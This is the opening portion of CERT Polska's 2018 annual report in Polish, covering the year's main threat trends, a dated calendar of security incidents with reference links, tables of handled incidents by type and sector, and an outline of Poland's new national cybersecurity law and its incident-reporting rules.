Raport roczny 2018 - CERT Polska

Raport roczny 2018z działalności CERT Polska

Krajobraz bezpieczeństwa polskiego internetu

Raport rocznyz działalności CERT Polska

2018

Krajobraz bezpieczeństwapolskiego internetu

W 2018 r. trzy najczęściej występujące typy incydentów to phishing, dystrybucja złośliwego oprogramowania i spam. Phishing to kategoria najbardziej wyróżniająca się na tle pozostałych ataków przy czym odsetek tego typu incydentów (ok. 44 proc.) utrzymał się na podobnym poziomie jak w roku 2017.

Przemysław Jaroszewski,Kierownik CERT Polska

Zdj.

unsp

lash

.com

, Ale

x Sh

utin

3Raport Roczny 2018

4 Wstęp5 O CERT Polska6 Najważniejsze obserwacje z 2018 roku8 Kalendarium10 Ochrona cyberprzestrzeni RP i działania CERT Polska10 Obsługa incydentów i reagowanie na zagrożenia14 Zmiany w sposobie zgłaszania incydentów w związku z wejściem w życie ustawy o krajowym systemie cyberbezpieczeństwa14 Za co są odpowiedzialne poszczególne CSIRT-y?14 Podział podmiotów na kategorie14 Rodzaje incydentów ustawowych15 Portal incydent.cert.pl16 Istotne zmiany w prawie16 Ustawa o krajowym systemie cyberbezpieczeństwa18 Rozporządzenie o Ochronie Danych Osobowych18 GDPR a zespoły CERT/ CSIRT19 Ćwiczenia i konkursy międzynarodowe19 Cyber Europe 201821 Locked Shields 201822 European Cyber Security Challenge23 Scena CTF24 SECURE 201825 Europejski Miesiąc Cyberbezpieczeństwa26 Biuletyn Ouch!27 Projekty27 SOASP27 Rozwój systemu Cuckoo27 Udostępnienie serwisu MWDB27 Wydanie n6 na otwartej licencji28 SISSDEN30 RegSOC31 Cyber Exchange31 Forensics32 System MWDB35 Zagrożenia i incydenty krajowe

35 Sextortion scams - “Znam Twoje hasło”38 Androidowe kampanie złośliwego oprogramowania38 Flaga Polski39 Bankowość uniwersalna Polska40 Certyfikat LTE 5+42 Aktualizacja sterownika LTE 5.043 BZWBKlight44 Kampania podszywająca się pod Niebezpiecznik i Orange45 InPost46 Wyciek danych ze sklepu Morele.net48 Ostap49 Brushaloader52 Backswap53 Danabot55 Anubis59 Fałszywe strony pośredników płatności61 Grupa „Payments”62 Grupa „Dotpay fr”64 Grupa „nr 3”66 Grupa „PayU”66 Grupa „2 min.”67 DDoS na home.pl69 Ransomware70 Nieodpowiednio zabezpieczone drukarki w polskiej przestrzeni adresów IP71 Technika duplikowania kart SIM74 Wybrane incydenty i zagrożenia ze świata74 Ataki na nowoczesne procesory (Meltdown i Spectre)74 Cache side-channel75 Spectre75 CVE-2017-5754: Bounds Check Bypass75 CVE-2017-5715: Branch Target Injection76 Meltdown76 CVE-2017-5754: Rogue Data Cache Load76 Nowsze warianty ataków76 Wpływ podatności77 Meltdown77 Spectre

77 LoJax79 Botnety IoT80 Mirai i jego warianty81 Hide’n’Seek82 Torii82 Sytuacja w Polsce84 Podsumowanie84 VPNFilter86 Magecart89 Amerykańskie oskarżenia przeciwko grupom APT89 Akcje dezinformacyjne “fabryki trolli”91 Działania APT28 wobec Krajowego Komitetu Partii Demokratycznej93 Działania APT28 wobec agencji antydopingowych94 Szpiegostwo przemysłowe w wydaniu APT1095 Podsumowanie96 Atak na Zimowe Igrzyska Olimpijskie (Olympic Destroyer)98 Zaawansowane zagrożenia98 Fancy Bear / APT2898 Lazarus / BlueNoroff / APT38100 LuckyMouse / APT27100 APT10100 BlackEnergy & GreyEnergy / TeleBots101 CozyDuke / APT29102 Turla / Snake103 Shamoon/Disttrack106 Statystyki106 Ograniczenia107 Botnety107 Botnety w Polsce107 Aktywność botnetów z podziałem na operatorów telekomunikacyjnych108 Serwery C&C111 Phishing111 Usługi pozwalające na prowadzenie ataków DRDoS120 Podatne usługi121 POODLE122 CWMP123 TFTP124 RDP125 Telnet126 Złośliwe Strony

Spis treści

Zdj.

unsp

lash

.com

, Ale

x Sh

utin

4 Raport Roczny 2018

Szanowni Państwo,

W 2018 roku doszło do istotnych zmian w za-kresie prawa i regulacji w obszarze cyberbezpie-czeństwa i ochrony danych osobowych. W maju zaczęło obowiązywać Rozporzędzenie o Ochro-nie Danych Osobowych, porządkujące temat przetwarzania danych osobowych i wprowadza-jące narzędzia do wymierzania odczuwalnych kar finansowych w przypadku naruszeń. Ustawa o krajowym systemie cyberbezpieczeństwa, któ-ra weszła w życie w sierpniu, to z kolei pierw-szy krajowy akt w randze ustawy wyznaczający konkretne role podmiotom odpowiedzialnym za cyberbezpieczeństwo kraju. Mocą tej ustawy, NASK PIB powierzone zostały m.in. zadania związane z rejestracją i koordynacją incydentów dotyczących operatorów usług kluczowych, do-stawców usług cyfrowych, a także dużej części sektora finansów publicznych oraz osób fizycz-nych. Duża część tych zadań realizowana jest przez zespół CERT Polska. Jednocześnie, misją zespołu niezmiennie pozostaje jak najlepsze po-znanie, zrozumienie i zmierzenie zagrożeń, na które narażeni są polscy użytkownicy internetu, oraz poszukiwanie skutecznych metod zapobie-gania, wykrywania i znoszenia tych zagrożeń.

Dodatkowa rola wynikająca z ustawy jest dla nas nie tylko wyróżnieniem, ale także okazją, by mi-sję tę realizować jeszcze skuteczniej, wspólnie z innymi instytucjami krajowego systemu cyber-bezpieczeństwa oraz z każdym, komu leży na sercu wspólne bezpieczeństwo w internecie.

Niniejszy raport przekrojowo obrazuje działal-ność CERT Polska w 2018 r. Jak zawsze, pre-zentujemy dane liczbowe na temat zgłoszeń od użytkowników, które obsłużyli nasi operatorzy, jak i te z systemów automatycznych, agregowa-nych w platformie n6. W obu przypadkach wzbo-gacamy je naszym komentarzem dotyczącym najważniejszych trendów i obserwacji. Opisuje-my najciekawsze nowe zagrożenia i podatności, a także projekty badawcze i wdrożeniowe, w któ-rych bierzemy udział.

Zapraszamy do lektury.

Zespół CERT Polska

Wstęp

5Raport Roczny 2018

Zespół CERT Polska działa w strukturach NASK– Państwowego Instytutu Badawczego prowa-dzącego działalność naukową, krajowy rejestr domen .pl i dostarczającego zaawansowane usługi teleinformatyczne. CERT Polska powstał w 1996 roku i był pierwszym w Polsce zespo-łem reagowania na incydenty (z ang. Computer Emergency Response Team).

Dzięki prężnej działalności w środowisku ze-społów reagujących, stał się rozpoznawalnym i doświadczonym podmiotem w dziedzinie bez-pieczeństwa komputerowego.

Od początku istnienia zespołu rdzeniem jego działalności jest obsługa incydentów bezpie-czeństwa i współpraca z podobnymi jednostkami na całym świecie, zarówno w działalności opera-cyjnej, jak i badawczo-wdrożeniowej.

Od 1998 roku CERT Polska jest członkiem mię-dzynarodowego forum zrzeszającego zespoły reagujące – FIRST, a od roku 2000 należy do grupy roboczej europejskich zespołów reagują-cych – TERENA TF-CSIRT i działającej przy niej organizacji Trusted Introducer.

W 2005 roku z inicjatywy CERT Polska po-wstało forum polskich zespołów abuse – Abuse FORUM, natomiast w 2010 roku CERT Polska dołączył do Anti-Phishing Working Group, sto-warzyszenia gromadzącego firmy i instytucje ak-tywnie walczące z przestępczością w sieci.

Do głównych zadań zespołu CERT Polska na-leży:• rejestrowanie i obsługa zdarzeń naruszających

bezpieczeństwo sieci;• wykrywanie i analiza zagrożeń wymierzonych

w szczególności w polskich internautów lub za-grażających domenie .pl;

• aktywne reagowanie w przypadku wystąpienia bezpośrednich zagrożeń dla polskich internau-tów;

• współpraca z innymi zespołami CERT w Polsce i na świecie oraz organami ścigania;

• udział w krajowych i międzynarodowych projek-tach związanych z tematyką bezpieczeństwa teleinformatycznego;

• działalność badawcza z zakresu metod wykry-wania incydentów bezpieczeństwa, analizy zło-śliwego oprogramowania i systemów wymiany informacji o zagrożeniach;

• rozwijanie własnych narzędzi do wykrywania, monitorowania, analizy i korelacji zagrożeń;

• regularne publikowanie Raportu CERT Polska o bezpieczeństwie polskich zasobów internetu;

• niezależne analizy i testy rozwiązań z dziedziny bezpieczeństwa teleinformatycznego;

• działania informacyjno-edukacyjne, zmierzają-ce do wzrostu świadomości w zakresie bezpie-czeństwa teleinformatycznego, w tym:»» publikowanie informacji o bezpieczeń- stwie na blogu cert.pl oraz w wybranych serwisach społecznościowych;»» organizacja cyklicznej konferencji SECURE;»» szkolenia specjalistyczne.

O CERT PolskaWstęp


Utrzymuje się tendencja wzrostowa w liczbie zgłoszeń incydentów. W porównaniu do 2017 roku liczba zarejestrowanych incydentów była większa o 17,5 proc. i wyniosła 3 739. Trzy czwarte z nich dotyczyło osób fizycznych lub podmiotów prywatnych. Trzy najczęściej występujące typy incydentów to phishing, dystrybucja złośliwego oprogramo-wania i spam. Phishing to kategoria najbardziej wyróżniająca się na tle pozostałych ataków przy czym odsetek tego typu incydentów (ok. 44 proc.) utrzymał się na podobnym poziomie jak w roku 2017. W 2018 roku zaszły istotne zmiany w systemie prawnym dotyczące cyberbezpieczeństwa – we-szły w życie: ustawa o krajowym systemie cy-berbezpieczeństwa oraz ogólne rozporządzenie o ochronie danych osobowych (RODO). Odnotowaliśmy prawie trzykrotny wzrost incy-dentów związanych z fałszywymi sklepami in-ternetowymi. Pokaźny wzrost zgłaszanych nam tego typu spraw ma związek nie tylko z nasile-niem się zjawiska, ale także z rosnącą świado-mością wśród obywateli. Scenariusze dotyczące podszywania się pod pośredników płatności, stały się w 2018 roku najpopularniejszym atakiem na użytkowników bankowości elektronicznej, powodując znaczne straty finansowe. W 2018 roku scenariusz zaczął być wykorzystywany w klasycznych fałszywych sklepach, szczególnie w końcowej „fazie życia” takiego sklepu. Rośnie liczba złośliwych aplikacji dla urządzeń mobilnych, przede wszystkim z systemem An-droid. Wiele z nich, między innymi podszywa-jących się pod legalne aplikacje finansowe, do-stępnych było do pobrania w oficjalnym sklepie. Jednym z popularniejszych rodzajów mobilnego złośliwego oprogramowania jest Anubis, ataku-

jący m.in. klientów kilkunastu polskich banków. Poza funkcjonalnością typową dla trojanów ban-kowych, Anubisa wyposażono w moduły RAT i ransomware. Obserwujemy ewolucję botnetów wykorzystują-cych urządzenia IoT. Powstało m.in. wiele wer-sji malware’u opartego o pierwotny kod botnetu Mirai, wykazujących się specjalizacją pod kątem konkretnych urządzeń, odkrytych podatności oraz przeznaczenia (np. ataki DDoS, cryptomi-ning, kradzież danych). Nowym groźnym zjawiskiem jest powstanie VP-NFilter - botnetu działającego na wielu modelach routerów domowych, opartego o zaawansowa-ne, wielomodułowe złośliwe oprogramowanie. W dalszym ciągu daje się zauważyć incydenty związane z udostępnieniem w publicznej sie-ci urządzeń takich jak drukarki sieciowe. Słabe uwierzytelnianie lub jego brak stanowią atrakcyj-ny cel dla atakujących.

W 2018 coraz częściej obserwowaliśmy ataki grup APT pochodzących z Azji. Do gry wróciły „uśpione” formacje zaawansowanych zagro-żeń np. APT27 \LuckyMouse lub WhiteWhale. W czołówce pod względem aktywności, kolejny rok z rzędu, przeważają grupy rosyjskie: APT28, APT29, Turla, GreyEnergy. Standardem stało się, że ataki grup APT wykorzystują nieznane wcześniej podatności tzw. 0-day’e. Podatności i zagrożenia dotyczą komponentów coraz niższego poziomu, także sprzętowego. Opisano m.in. ataki związane z nadużyciem optymalizacji procesora (Meltdown, Spectre) oraz rootkit działający jako moduł UEFI (LoJax). Blisko 2 miliony unikalnych adresów IP z polskich sieci rozgłaszało usługi, które mogą być wyko-rzystane w atakach DRDoS. Najwięcej z nich to źle skonfigurowane otwarte serwery DNS.

Najważniejsze obserwacje z 2018 roku

7Raport Roczny 2018

Najważniejsze obserwacje z 2018 roku

Zdj.

unsp

lash

.com

, And

ras V

as


Kalendarium

01 styczeń 2018 więcej informacji...

02 Bug w procesorach Intela

• https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/• https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory

-with-side.html• https://spectreattack.com/spectre.pdf• https://meltdownattack.com/meltdown.pdf• http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case

-of-the-linux-page-table• http://pythonsweetness.tumblr.com/post/169217189597/quiet-in-the-peanut-

gallery• https://zaufanatrzeciastrona.pl/post/znamy-juz-szczegoly-krytycznych-bledo-

w-w-wielu-procesorach/

09 KolejneRCEwEquationEditorwOffice2016 • https://research.checkpoint.com/another-office-equation-rce-vulnerability/

12 Luka w Intel ME (AMT) • https://business.f-secure.com/intel-amt-security-issue• https://zaufanatrzeciastrona.pl/post/amt-czyli-kto-moze-znienacka-zaczac-za-

rzadzac-twoim-laptopem/

18 wyskoczeniezmaszynywirtualnejidostęp na SYSTEM (Windows 10) • https://twitter.com/_niklasb/status/953604276726718465

22 Blizzard–DNSRebindingwwiększościtytułów• https://bugs.chromium.org/p/project-zero/issues/detail?id=1471&desc=2• https://zaufanatrzeciastrona.pl/post/wyjasniamy-dns-rebinding-czyli-jak-mo-

zna-bylo-zhakowac-setki-milionow-komputerow/

26 ZatrzymanieprzezCBAtwórcówmobilnegoAV,LabMSF

• https://niebezpiecznik.pl/post/cba-zatrzymalo-tworcow-polskiego-antywirusa-ktory-w-ogole-nie-dzialal/

29 CiscoASA-pre-authRCE,CVSS10.0 • https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

02 luty 2018 więcej informacji...

01 Bug w procesorach Intela• https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequen-

ce=26998• https://helpx.adobe.com/security/products/flash-player/apsa18-01.html• https://twitter.com/issuemakerslab/status/959006385550778369

09 Cyberataknaceremonięotwarciazimowychigrzysk olimpijskich w Pjongczangu

• https://zaufanatrzeciastrona.pl/post/znamy-szczegoly-ataku-na-igrzyska-olim-pijskie-i-sa-calkiem-ciekawe/

• http://blog.talosintelligence.com/2018/02/olympic-destroyer.html• https://www.recordedfuture.com/olympic-destroyer-malware/

13 BłądwTelegramieumożliwiającyinstalacjęzłośli-wego oprogramowania

• https://zaufanatrzeciastrona.pl/post/powazny-blad-w-telegramie-pomagal-w-instalacji-kryptominerow/

20 BłędywkliencieuTorre • https://bugs.chromium.org/p/project-zero/issues/detail?id=1524

26 SporopolskichdokumentówwVirusTotal • https://zaufanatrzeciastrona.pl/post/wazne-i-poufne-dokumenty-wielu-pol-skich-firm/

28 DDoSnaGHowielkości1,3terabitanasekundę • https://zaufanatrzeciastrona.pl/post/gigantyczny-atak-ddos-na-githuba-13-te-rabita-na-sekunde/

03 marzec 2018 więcej informacji...

15 Aresztowanie Thomasa

• hhttps://zaufanatrzeciastrona.pl/post/thomas-najbardziej-uciazliwy-polski-cy-berprzestepca-zatrzymany-przez-policje/

• https://zaufanatrzeciastrona.pl/post/181-zarzutow-kilka-tysiecy-ofiar-znamy-szczegoly-zatrzymania-thomasa/

• https://niebezpiecznik.pl/post/armaged0n-czyli-tomasz-t-od-6-lat-regularnie-a-takujacy-polakow-wreszcie-zostal-aresztowany/

28 RCE w Drupalu • https://www.drupal.org/sa-core-2018-002

29 RCE w Cisco IOS • https://embedi.com/blog/cisco-smart-install-remote-code-execution/• https://zaufanatrzeciastrona.pl/post/uwaga-na-bledy-w-switchach-cisco-uzy-

wane-wlasnie-w-atakach-na-iran-i-rosje/

9Raport Roczny 2018

04 kwiecień 2018 więcej informacji...23 Mikrotik WinBox 0 day • https://twitter.com/x0rz/status/988742792976400384

• https://sekurak.pl/krytyczna-podatnosc-w-mikrotikach-latajcie-asap/

25 KampaniapodszywającasiępodAllegro • https://zaufanatrzeciastrona.pl/post/uwaga-allegrowicze-nowa-kampania-phishingowa-zablokowana-sprzedaz/

05 maj 2018 więcej informacji...

14 PodatnościwimplementacjachOpenPGPorazS/MIME: „EFAIL”

• https://www.cert.pl/news/single/podatnosci-w-implementacjach-openpgp-o-raz-s-mime-efail/

22 Kampania BackSwap (Tinba) • https://zaufanatrzeciastrona.pl/post/klienci-pko-bp-bz-wbk-mbanku-ing-i-pe-kao-na-celowniku-nowego-malware/

23 VPNFilter • https://blog.talosintelligence.com/2018/05/VPNFilter.html• https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

31 DanaBot • https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-tro-jan-surfaces-down-under-0

06 czerwiec 2018 więcej informacji...01 AwariasystemuVISAwEuropie • https://sekurak.pl/awaria-systemu-visa-w-europie-sklepy-nie-przyjmuja-plat-

nosci-kartami/

12 Awariaserwisówwgov.pl • https://sekurak.pl/obywatel-gov-pl-profil-zaufany-cepik-epuap-down/

15 SigSpoof • https://sekurak.pl/wysylanie-szyfrowanych-maili-gpg-mozna-falszowac-podpi-sy-sigspoof-cve-2018-12020/

28 Kompromitacja mirrora git Gentoo • https://sekurak.pl/gentoo-github-mirror-zhackowany/

07 lipiec 2018 więcej informacji...10 Spectre za 100k USD • https://people.csail.mit.edu/vlk/spectre11.pdf

09 wrzesień 2018 więcej informacji...10 0-day na Tor Browser • https://zaufanatrzeciastrona.pl/post/aktualizujcie-tor-browsera-w-starszych

-wersjach-jest-powazny-trywialny-blad/

27 Backdoor UEFI w Polsce • https://zaufanatrzeciastrona.pl/post/wyrafinowany-backdoor-uefi-obecny-takze-w-polskich-sieciach/

28 PodatnośćFacebooka • https://zaufanatrzeciastrona.pl/post/50-milionow-kont-uzytkownikow-facebo-oka-zagrozonych-atakiem/

10 październik 2018 więcej informacji...04 Chińskiebackdoorysprzętowe • https://zaufanatrzeciastrona.pl/post/odkryto-chinskie-backdoory-sprzetowe-a-

le-nic-nie-jest-takie-oczywiste/

16 Kampania SMS „Biedronka” • https://niebezpiecznik.pl/post/polakow-zalewaja-e-maile-i-sms-y-informujace-o-nagrodzie-ktora-jest-karta-biedronki-na-1000-pln/

26 KampaniapodszywającasiępodPLAY • https://niebezpiecznik.pl/post/playfinanse-sms-scam-na-doplate

30 KampaniapodszywającasiępodProfilZaufany • https://niebezpiecznik.pl/post/uwaga-na-zlosliwe-e-maile-z-tematem-profil-za-ufany/

30 Phishing„WeryfikacjakontaAllegro” • https://niebezpiecznik.pl/post/p-weryfikacja-konta-allegro-payu/

11 listopad 2018 więcej informacji...25 Kampania SMS „OPERATOR” • https://niebezpiecznik.pl/post/uwaga-na-sms-y-od-nadawcy-operator/

12 grudzień 2018 więcej informacji...01 Phising ING • https://zaufanatrzeciastrona.pl/post/uwaga-klienci-ing-po-awarii-banku-dzisiaj

-atak-na-wasze-konta/

05 0-day na Flasha od HT • https://github.com/smgorelik/Windows-RCE-exploits/blob/master/Documents/Office%2BFlash/CVE-2018-15982_%23PoC%23.zip

Kalendarium


Obsługaincydentówireagowanienazagrożenia

Dane zawarte w niniejszej części raportu do-tyczą wyłącznie zgłoszeń i incydentów zareje-strowanych i obsłużonych przez CERT Polska. Wszystkie zgłoszenia pochodzą z formula-rza znajdującego się na stronie www.cert.pl albo zostały przesłane na adres zgłoszeniowy [email protected] lub zaobserwowane przez zespół CERT Polska. Nie obejmują one informacji o in-cydentach gromadzonych i wymienianych auto-matycznie w systemie n6.

W 2018 r. CERT Polska zanotował 19 439 zgło-szeń, które zostały przeanalizowane i pogru-powane. 5 675 zostało zaklasyfikowane jako dotyczące rzeczywistych incydentów. Na ich podstawie zarejestrowaliśmy łącznie 3 739 in-cydentów. Tabela 1. zawiera liczbę obsłużonych incydentów z podziałem na kategorie wg klasyfi-kacji eCSIRT.net.

CERT Polska odnotował wzrost liczby obsłużo-nych incydentów na poziomie 17,5 proc. w po-równaniu do 2017 r. W zeszłym roku najczęściej występującym typem ataku był phishing, który stanowił ok. 44 proc. wszystkich incydentów. Zgłoszenia dotyczące dystrybucji złośliwego oprogramowania znalazły się na drugim miejscu, stanowiąc ok. 23 proc. Incydenty o charakterze spamu stanowiły odsetek ok. 11,2 proc. wszyst-kich zarejestrowanych incydentów.

W 2018 r. znaczącą popularność wśród prze-stępców zyskały fałszywe sklepy internetowe. W odniesieniu do 2017 r. odnotowaliśmy prawie 3-krotny wzrost incydentów tego typu. Pokaźny wzrost zarejestrowanych incydentów dotyczą-cych fałszywych sklepów internetowych ma duży związek z rosnącą świadomością wśród obywa-teli o tego typu oszustwach w internecie. Prze-stępcy chcąc trafić do większej liczby odbiorców, posługują się pozycjonowaniem reklam w popu-larnych wyszukiwarkach internetowych oraz me-diach społecznościowych.

Odsetek phishingów wzrósł o blisko 3 punkty procentowe w porównaniu do 2017 r. i pozo-stał na bardzo wysokim poziomie wynoszącym 1655 zarejestrowanych unikalnych incydentów. Najczęściej zgłaszanymi incydentami phishin-gowymi były fałszywe strony zagranicznych serwisów, takich jak Netflix lub PayPal, zamiesz-czone na polskich serwerach, rzadziej phishing polskich instytucji, znajdujący się na serwerach zagranicznych. Najbardziej powszechnym mo-tywem przestępców przy tworzeniu fałszywych stron była chęć pozyskania danych uwierzytel-niających (login i hasło) do różnych serwisów, w tym banków.

Zgłoszeń dotyczących złośliwego oprogramo-wania było mniej niemal o 4 punkty procentowe w porównaniu do 2017 r. Znacząca większość odnotowanych incydentów dotyczyła złośliwego oprogramowania atakującego polskiego użyt-kownika. W przypadku dużych kampanii mailo-wych otrzymywaliśmy wiele zgłoszeń związa-nych z tym samym złośliwym oprogramowaniem. Często obserwowanym atakiem była wiadomość e-mail z rzekomą fakturą, powiadomieniem bądź dokumentem, rozsyłana w imieniu znanej firmy, zawierająca pliki ze skryptem, dokumentem lub adresem internetowym odsyłającym do pobrania złośliwego oprogramowania. Chętnie wykorzy-stywane przez przestępców były różne warian-ty oprogramowania typu ransomware oraz tzw. bankery, czyli złośliwe oprogramowanie ukierun-kowane na klientów bankowości elektronicznej i mobilnej. Tak jak w latach poprzednich, kla-syfikacja zgłoszonych incydentów dotyczących złośliwego oprogramowania jest skomplikowana i w niektórych przypadkach może nie odzwier-ciedlać faktycznego typu zagrożenia. Powodem jest złożoność ataków, w których na poszczegól-nych etapach wykorzystywane są różne meto-dy i typy złośliwego oprogramowania, np. przy pomocy exploit kita czy konia trojańskiego do-chodzi do zainstalowania klienta botnetu, który

Ochrona cyberprzestrzeni RP i działania CERT Polska

11Raport Roczny 2018

z kolei może posiadać wiele funkcji np. oprogra-mowania szpiegującego, trojana bankowego czy ransomware.

Kolejnym typem zarejestrowanych incydentów są zgłoszenia o charakterze spamu, które w po-równaniu z 2017 rokiem podwoiły swoją liczbę. Niewielki udział innych rodzajów nielegalnych i obraźliwych treści wynika z faktu, że ich obsłu-gą zajmuje się dedykowany do tego celu zespół Dyżurnet.pl (www.dyzurnet.pl), który również działa w strukturach NASK.

Pozostałe kategorie zgłoszeń są równie ważne i ciekawe z punktu widzenia CERT Polska. Za-notowaliśmy wiele incydentów z próbami wła-mań do systemów, urządzeń i aplikacji – zakoń-czonych sukcesem bądź tylko podjętych. Część z tych ataków została przeprowadzona tylko i wyłącznie poprzez słabo zabezpieczone tzw. urządzenia internetu rzeczy (ang. IoT – Internet of Things), które często posiadają niezmienioną, standardową konfigurację producenta z domyśl-nym hasłem dostępowym.

Typ incydentu Liczba incydentów %

Obraźliwe i nielegalne treści 431 11,53

Spam 419 11,21

Dyskredytacja, obrażanie 5 0,13

Pornografia dziecięca, przemoc 0 0,00

Niesklasyfikowane 7 0,19

Złośliwe oprogramowanie 862 23,05

Wirus 4 0,11

Robak sieciowy 0 0,00

Koń trojański 117 3,13

Oprogramowanie szpiegowskie 0 0,00

Dialer 1 0,03

Rootkit 1 0,03


Gromadzenie informacji 101 2,70

Skanowanie 80 2,14

Podsłuch 1 0,03

Inżynieria społeczna 7 0,19


Próby włamań 153 4,09

Wykorzystanie znanych luk systemowych 30 0,80

Próby nieuprawnionego logowania 37 0,99

Ochrona cyberprzestrzeni RP i działania CERT Polska


Wykorzystanie nieznanych luk systemowych 0 0,00


Włamania 125 3,34

Włamanie na konto uprzywilejowane 11 0,29

Włamanie na konto zwykłe 21 0,56

Włamanie do aplikacji 35 0,94

Bot 4 0,11


Dostępność zasobów 49 1,31

Atak blokujący serwis (DoS) 7 0,19

Rozproszony atak blokujący serwis (DDoS) 35 0,94

Sabotaż komputerowy 0 0,00

Przerwa w działaniu usług (niezłośliwe) 1 0,03


Atak na bezpieczeństwo informacji 46 1,23

Nieuprawniony dostęp do informacji 21 0,56

Nieuprawniona zmiana informacji 13 0,35


Oszustwa komputerowe 1 878 50,23

Nieuprawnione wykorzystanie zasobów 1 0,03

Naruszenie praw autorskich 8 0,21

Kradzież tożsamości, podszycie się 43 1,15

Phishing 1 655 44,26


Podatne usługi 69 1,85

Otwarte serwisy podatne na nadużycia 14 0,37


Inne 25 0,67

Tabela 1. Incydenty obsłużone przez CERT Polska w 2018 r. według typów.


Sektor gospodarki Liczba incydentów %

Infrastruktura cyfrowa 29 0,78

Służba zdrowia 13 0,35

Bankowość 643 17,20

Finanse 62 1,66

Energetyka 20 0,53

Transport 51 1,36

Sektor publiczny 85 2,27

Wodociągi 2 0,05

Inne 2 834 75,80

Razem 3 739 100,00

Tabela 2. Incydenty obsłużone przez CERT Polska w 2018 r. wg klasyfikacji ze względu na sektor gospodarki.

Rok Liczba incydentów1996 501997 751998 1001999 1052000 1262001 7412002 1 0132003 1 1962004 1 2222005 2 5162006 2 4272007 2 1082008 1 7962009 1 2922010 6742011 6052012 1 0822013 1 2192014 1 2822015 1 4562016 1 9262017 3 1822018 3 739

Tabela 3. Liczba incydentów obsłużonych ręcznie przez CERT Polska na przestrzeni lat.


Zmianywsposobiezgłaszaniaincydentówwzwiązkuzwejściemwżycieustawyokrajowymsystemiecyberbezpieczeństwa

28 sierpnia 2018 r. weszła w życie ustawa o kra-jowym systemie cyberbezpieczeństwa (por. str. 16). Jej skutkiem było desygnowanie trzech CSIRT-ów1 poziomu krajowego, prowadzonych przez NASK PIB, szefa Agencji Bezpieczeństwa Wewnętrznego oraz Ministra Obrony Narodowej. Jedną z największych zmian jest wprowadzenie obowiązku zgłaszania niektórych incydentów komputerowych.

ZacosąodpowiedzialneposzczególneCSIRT-y?

CSIRT MON koordynuje obsługę incydentów z podmiotów podległych Ministrowi Obrony Na-rodowej, a także przedsiębiorstw o szczególnym znaczeniu gospodarczo-obronnym2, wykonu-jących zadania na rzecz obronności państwa. Właściwością CSIRT MON są również wszystkie incydenty związane z obronnością kraju.

Administracja rządowa, Narodowy Bank Polski, Bank Gospodarstwa Krajowego oraz operatorzy infrastruktury krytycznej to podmioty, które po-winny zgłaszać swoje incydenty do CSIRT GOV, działającego w ramach Agencji Bezpieczeń-stwa Wewnętrznego. Zarówno CSIRT MON jak i CSIRT GOV są właściwe w przypadku incyden-tów o charakterze terrorystycznym.

Koordynacją incydentów dotyczących wszyst-kich pozostałych podmiotów takich jak więk-szość operatorów usług kluczowych, dostawcy usług cyfrowych czy administracja samorządo-wa, zajmuje się CSIRT NASK. Do CSIRT NASK incydenty mogą także zgłaszać osoby fizyczne – zwykli obywatele. Można więc powiedzieć, że CSIRT NASK stanowi tzw. „CERT ostatniej szan-sy” (CERT of last resort).

Podziałpodmiotównakategorie

Zgodnie z ustawą, podmioty dzielimy na:• infrastrukturę krytyczną - systemy oraz

wchodzące w ich skład powiązane ze sobą funkcjonalnie obiekty, w tym obiekty budow-lane, urządzenia, instalacje, usługi kluczowe dla bezpieczeństwa państwa i jego obywateli

oraz służące zapewnieniu sprawnego funk-cjonowania organów administracji publicz-nej, a także instytucji i przedsiębiorców3,

• operatorów usług kluczowych - podmioty świadczące usługę, która ma kluczowe zna-czenie dla utrzymania krytycznej działalno-ści społecznej lub gospodarczej, wymienio-nej w wykazie usług kluczowych,

• dostawców usług cyfrowych - podmioty, które posiadają siedzibę lub przedstawicie-la na terenie Rzeczypospolitej Polskiej oraz świadczą usługę cyfrową, tzn. prowadzą wyszukiwarkę internetową, publiczną chmu-rę lub platformę umożliwiającą zawieranie transakcji (np. portale aukcyjne, sklepy inter-netowe)4,

• podmioty publiczne - m. in. jednostki sek-tora finansów publicznych, spółki prawa han-dlowego wykonujące zadania o charakterze użyteczności publicznej i podobne.

Ponadto podmiot publiczny, świadczący usługę kluczową, jest traktowany zgodnie z przepisami przewidzianymi dla operatorów usług kluczo-wych.

Rodzajeincydentówustawowych

Firmy, przedsiębiorstwa i instytucje objęte kra-jowym systemem cyberbezpieczeństwa nie są zobowiązane do zgłaszania wszystkich incyden-tów. Ustawa definiuje trzy rodzaje incydentów, które muszą zostać zgłoszone odpowiedniemu CSIRT-owi:

• incydent poważny - incydent, który powodu-je lub może spowodować znaczne obniżenie jakości lub przerwanie ciągłości świadczenia usługi kluczowej; progi uznania incydentu za poważny określa Rozporządzenie Rady Mi-nistrów z 31 października 2018 roku w spra-wie progów uznania incydentu za poważny

• incydent istotny - incydent mający istot-ny wpływ na świadczenie usługi cyfrowej, zgodnie z kryteriami rozporządzenia wyko-nawczego Komisji Europejskiej nr 2018/ 151 z 30 stycznia 2018 roku,

1 Zespołów Reagowania na Incydenty Bezpieczeństwa Komputerowego2 zgodnie z Art. 26 ust. 5 pkt. 2 ustawy z dnia 5 lipca 2018 r. o krajowym systemie cyberbezpieczeństwa (Dz.U. 2018 poz. 1560)3 definicja zawarta jest w Art. 2 ustawy z dnia 26 kwietnia 2007 r. o zarządzaniu kryzysowym (Dz.U. 2007 Nr 89 poz. 590)4 definicja zawarta jest w Art. 17. ust. 1 ustawy z dnia 5 lipca 2018 r. o krajowym systemie cyberbezpieczeństwa (Dz.U. 2018 poz. 1560)


• incydent w podmiocie publicznym - incy-dent, który powoduje lub może spowodować obniżenie jakości lub przerwanie realizacji zadania publicznego.

Dodatkowo, określone zdarzenie może zostać zakwalifikowane jako incydent krytyczny, czy-li taki, który m.in. skutkuje znaczną szkodą dla bezpieczeństwa państwa lub porządku publicz-nego. Takie oznaczenie może zostać nadane tylko przez CSIRT poziomu krajowego w toku koordynacji incydentu.

Portal incydent.cert.pl

Wraz z wejściem w życie ustawy o KSC, CSIRT NASK udostępnił nowy portal incydent.cert.pl, który umożliwia zgłaszanie incydentów zgod-nie z ustawą, jednocześnie wyjaśniając kwestie związane z KSC w możliwie przystępny sposób.

